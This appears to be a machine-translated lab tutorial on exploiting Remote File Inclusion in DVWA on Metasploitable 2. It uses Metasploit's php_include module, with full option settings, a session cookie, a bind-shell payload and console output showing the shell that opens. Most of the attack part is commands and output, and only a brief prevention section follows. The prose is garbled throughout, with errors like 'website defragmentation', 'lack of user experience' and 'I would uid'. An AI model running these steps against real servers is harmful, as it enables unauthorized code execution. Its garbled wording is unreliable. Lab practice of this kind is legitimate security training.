A simple security flaw can allow an attacker to gain a foothold with little effort. When a web application allows remotely hosted files to be loaded without validation, it opens a whole can of worms, with consequences ranging from a simple website defragmentation feature to the full execution of code. Because of this, RFI can be a promising way to get a shell.
Today we will be targeting DVWA, a vulnerable web application included in the Metasploitable 2 virtual machine. Kali Linux and the Metasploit Framework serve as attack tools.
What is RFI?
Remote File Inclusion (RFI) is a type of security vulnerability in Web applications that allows an attacker to attach a remote file to the application. The file can be dynamically processed in several ways, including the execution of code on the server, the disclosure of sensitive information, and the execution of client-side code .
RFI occurs if the path of a file used as input does not exist is cleaned up properly, so that an external URL can be processed over HTTP. This type of vulnerability is most common in PHP applications, but also in ASP, JSP, and other technologies.
In this guide, we will exploit an RFI vulnerability to obtain a command shell on the target system
step 1: Initial Setup
Before we begin, we need to configure a few things to make this attack successful. First, start Metasploitable and log in with msfadmin as credentials. Next, on Kali, open DVWA in the browser and navigate to the "DVWA Security" tab. Set the security level to low .
Back to Metasploitable we need to make sure that some settings in the PHP configuration are enabled for demonstration purposes. The option allow_url_fopen allows access to files on remote hosts or servers, while the option allow_url_include of a remote file allows the use of a URL instead of a local file path. These settings can be found in the file php.ini . Edit them to make sure they are enabled with:
sudo nano /etc/php5/cgi/php.ini
Press Ctrl-W to search for the string "allow_url" and ensure that allow_url_fopen and allow_url_include are both set to On . Press Ctrl-X Y and Enter to save the file. Restart the Apache server by entering the following command:
sudo /etc/init.d/apache2 restart
Next we need to create a test file to look for RFI. Create the file in / var / www / html on our Kali machine so that it is accessible from a web browser.
Enter a text such as "vulnerable to RFI!" and save the file. Now restart Apache and we should go well.
service apache2 restart
Step 2: Check RFI
To check if an RFI vulnerability exists, we can simply ask the web application in question to retrieve the previously created file. In DVWA, go to the "File Inclusion" page and replace the requested page with the path of our test file hosted on Kali.
When the page loads, we can see the text from our test file, the indicates that this page is indeed vulnerable to RFI.
From here we could try to manually invoke a shell by uploading a script, but there is a handy Metasploit module that still supports this process makes it easier.
Step 3: Exploit & Get Shell
The first thing we need to do is get some cookie information for this exploit to work properly. In DVWA, reload the page and use "Check Item" to view the request.
We Need the Cookie Information Containing the Security Level and Session ID
Start Metasploit by typing msfconsole in the terminal. We will use the module php_include; Locate it by typing Search php_include . Now enter to load the module with exploit / unix / webapp / php_include . From here we can see the settings:
msf exploit (unix / webapp / php_include)> Options Module options (exploit / unix / webapp / php_include): Name Current setting required Description ---- --------------- -------- ----------- HEADERS no No additional HTTP headers to send, cookies for example. Format: "Header: Value, Header2: Value2" PATH / yes The base directory prefixed by the URL being tested PHPRFIDB /usr/share/metasploit-framework/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL PHPURI no The URI to request with the include parameter changed in XXpathXX POSTDATA no The POST data to send with the include parameter changed in XXpathXX Proxies no A proxy chain of the format type: host: port [,type:host:port][...] RHOST yes The destination address RPORT 80 yes The destination port (TCP) SRVHOST 0.0.0.0 Yes The local host to listen to. This must be an address on the local computer or 0.0.0.0 SRVPORT 8080 yes The local port to listen to. SSL false no Negotiate SSL / TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Exploit target: ID name - ---- 0 Automatic
First, set the destination address to the IP address of Metasploitable. Next, set the header option to the cookie value we received earlier. We also need to set the path to the page's home directory, followed by the specific URI you want to request. Metasploit automatically detects the endpoint for the attack by replacing the parameter with XXpathXX .
msf exploit (unix / webapp / php_include)> set rhost 172.16.1.102 rhost => 172.16.1.102 msf exploit (unix / webapp / php_include)> Set header "Cookie: security = low; PHPSESSID = 4c0c7c70dfafab05e7d04c88c8966aee" headers => cookie: security = low; PHPSESSID = 4c0c7c70dfafab05e7d04c88c8966aee msf exploit (unix / webapp / php_include)> set path / dvwa / vulnerabilities / fi / Path => / dvwa / vulnerabilities / fi / msf exploit (unix / webapp / php_include)> set phpuri /? page = XXpathXX phpuri => /? page = XXpathXX
Now we can choose a payload.
msf exploit (unix / webapp / php_include)> Show payload Compatible payloads ====================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- generic / custom normal custom payload generic / shell_bind_tcp normal Generic command shell, bind TCP inline generic / shell_reverse_tcp normal generic command shell, reverse TCP inline php / bind_perl normal PHP command shell, Bind TCP (via Perl) php / bind_perl_ipv6 normal PHP command shell, Bind TCP (via Perl) IPv6 php / bind_php normal PHP command shell, Bind TCP (via PHP) php / bind_php_ipv6 normal PHP command shell, Bind TCP (via PHP) IPv6 php / download_exec normal PHP Executable Download and Execute php / exec execute normal PHP command php / meterpreter / bind_tcp normal PHP meterpreter, Bind TCP Stager php / meterpreter / bind_tcp_ipv6 normal php meterpreter, Bind TCP Stager IPv6 php / meterpreter / bind_tcp_ipv6_uuid normal PHP meterpreter, bind TCP Stager IPv6 with UUID support php / meterpreter / bind_tcp_uuid normal PHP meterpreter, Bind TCP Stager with UUID support php / meterpreter / reverse_tcp normal php meterpreter, php reverse TCP stager php / meterpreter / reverse_tcp_uuid normal php meterpreter, php reverse TCP stager php / meterpreter_reverse_tcp normal php meterpreter, reverse TCP inline php / reverse_perl normal PHP command, double reverse TCP connection (via Perl) php / reverse_php normal PHP command shell, reverse TCP (via PHP) php / shell_findsock normal PHP command shell, search sock
Set this to a simple PHP bind shell and type run to start the exploit.
msf exploit (unix / webapp / php_include)> set payload php / bind_php Payload => php / bind_php Execute msf exploit (unix / webapp / php_include)> [*] 172.16.1.102:80 - Using the URL: http://0.0.0.0:8080/VTve3BEQtgo [*] 172.16.1.102:80 - Local IP: http://172.16.1.100:8080/VTve3BEQtgo [*] 172.16.1.102:80 - PHP include server started. [*] Begins the Bind TCP handler against 172.16.1.102:4444 [*] Command Shell Session 1 has been opened (172.16.1.100:37679 -> 172.16.1.102:4444) at 2018-09-05 11:48:37 -0500 I would uid = 33 (www data) gid = 33 (www data) Groups = 33 (www data) uname -a Linux metsploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux
A session opens and we can issue commands like id and , uneame -a to see information about the system that now has a shell
RFI can be a particularly nasty vulnerability, especially if an attacker can get a shell and execute commands like us have demonstrated. Fortunately, it is easier to prevent RFI than you think.
The most effective method of prevention is not to use files as user-supplied input. This dramatically reduces the attack surface, making it almost impossible for an adversary to trap malicious files. If this is not possible, the application can whitelist the contained files.
Modern versions of PHP typically disable the allow_url_include option by default, which prevents attackers from remotely deploying malicious files
RFI, like many other vulnerabilities in web applications, comes from a lack of user experience – in this case, file paths that allow the application to load a remote file. This can lead to dangerous effects, eg. For example, disclosure of confidential information and code execution. We learned how to test this vulnerability, and finally got a shell on the target using a helpful Metasploit module. Although RFI can occur in different types of applications, the number of outdated and insecure PHP applications on the Internet makes this particular vulnerability interesting.